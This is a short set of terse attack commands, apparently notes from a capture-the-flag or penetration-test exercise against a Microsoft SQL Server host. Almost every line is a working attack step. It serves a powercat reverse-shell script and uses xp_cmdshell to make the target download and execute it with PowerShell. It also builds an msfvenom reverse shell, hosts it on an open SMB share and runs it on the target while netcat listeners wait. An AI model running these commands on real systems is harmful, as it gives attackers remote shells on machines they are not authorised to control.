wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
printf "powercat -c <KALI IP> -p 443 -ep\n" >> powercat.ps1
nohup python -m SimpleHTTPServer 80 &
nc -lvp 443 # from another tmux pane, not sure if it mattered...
function pwn(){ mssqlclient.py -debug -windows-auth mssql-svc:[email protected]; } # made it easier for me..
# you'll have to change the IP, but this just worked..
xp_cmdshell "powershell -exec bypass iex((new-object system.net.webclient).downloadstring(\"http://10.10.14.52:80/powercat.ps1\"))" 
msfvenom -p windows/shell_reverse_tcp LHOST=<KALI IP> LPORT=443 -f exe > shell.exe 
service smbd start && chmod -R 777 ../
net usershare add pwn `pwd` pwn everyone:F guest_ok=y
nohup nc -lvp 443 &
xp_cmdshell "cmd /c \\<KALI IP>\pwn\shell.exe"
fg 1